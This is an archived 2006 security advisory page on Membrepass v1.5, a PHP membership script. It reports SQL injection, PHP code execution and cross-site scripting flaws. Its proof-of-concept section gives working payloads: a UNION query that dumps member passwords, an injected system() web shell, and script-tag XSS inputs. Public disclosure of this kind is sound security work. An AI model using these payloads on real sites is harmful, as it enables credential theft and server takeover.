SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
Search :
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

Membrepass v1.5 Php code execution, Xss, Sql Injection


Arrow  SecurityAlert : 1487
Arrow  CVE : CVE-2006-4530
Arrow  CVE : CVE-2006-4529
Arrow  CVE : CVE-2006-4528
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Given : Yes
Arrow  Credit : DarkFig
Arrow  Published : 05.09.2006

Arrow  Affected Software : Membrepass v1.5



Arrow  Advisory Text :  

=================================================================

Affected.scr..: Membrepass v1.5

Advisory.ID...: 09290806

Type..........: Cross Site Scripting, SQL Injection

Php code execution

Risk.level....: Medium

Vendor.Status.: Unpatched

Src.download..: comscripts.com/scripts/php.membrepass.1459.html

Adv.link......: acid-root.new.fr/advisories/09290806.txt

=================================================================

==[ OVERVIEW

============

membrepass AVEC MESSAGERIE est un espace membre installation automatique.

Marche sur FREE,ONLINE et les autres hébergeurs.Le script est entierement

configurable et possible d'ajouter les couleurs de votre site.

Vous pouvez ajouter ou supprimer les champs formulaire.

Protection des emails contre aspirateurs (anti SPAM).

[Quote from www.comscripts.com]

==[ DETAILS

===========

Many vulnerabilities have been discovered in Membrepass v1.5.

1)Input passed to the "recherche" parameter in /recherchemembre.php isn't

properly sanitised before being used in a SQL query. This bug can be

exploited to conduct SQL injection attacks. Successful exploitation may

require that "magic_quotes_gpc" is disabled.

2)Input passed to the "aifon" parameter in /include/change.php isn't

properly satanised before being used in fputs() function. This can

be exploited to execude PHP code. Successful exploitation may require

that "register_globals" is enabled and "magic_quotes_gpc" is disabled.

3)Input passed to the "recherche" parameter in /recherchemembre.php and

to the "email" parameter in /test.php isn't properly satanised before

being returned to the user. This can be exploited to conduct cross-site

scripting attacks. Successful exploitation may require that

"register_globals" is enabled.

==[ POC/EXPLOIT

===============

POST /recherchemembre.php DATA recherche=' UNION SELECT
passe,0,email,0,0,0,0,0,0,0,0,0,pseudo,0,0,0,0,0,0,0,0,0 FROM membre #

GET /include/change.php DATA ainfo="; $cmd = $_GET['cmd']; system($cmd);
exit; // http://.../include/variable.php?cmd=dir

POST /recherchemembre.php DATA recherche=</b><script>alert(666)</script>

GET /test.php DATA email=<script>alert(666)</script>

==[ SOLUTION

============

Edit the source code to ensure that input is properly verified.

==[ TIMELINE

============

29. Aug. 2006 - Public Disclosure

==[ CONTACT

===========

Author: DarkFig

Web...: www.acid-root.new.fr

E-mail: gmdarkfig[*]gmail[*]com (fr/en)




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

Multiple Vendors libc/gdtoa printf(3) Array Overrun

Security Risk High- 2009-05-30

SecurityReason realised new advisory about vulnerabilities libc/gdtoa...

Apache RSS Apache Alert

» Apache Tomcat
   RequestDispatcher
   directory traversal
   vulnerability

» Apache mod_dav / svn
   Remote Denial of Service
   Exploit

» Apache Tomcat Information
   disclosure

» Apache Tomcat User
   enumeration vulnerability
   with FORM authentication

PHP RSS PHP Alert

» PHP 5.2.9 curl safe_mode
   & open_basedir bypass

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file

Copyright © SecurityReason.com. All Rights Reserved.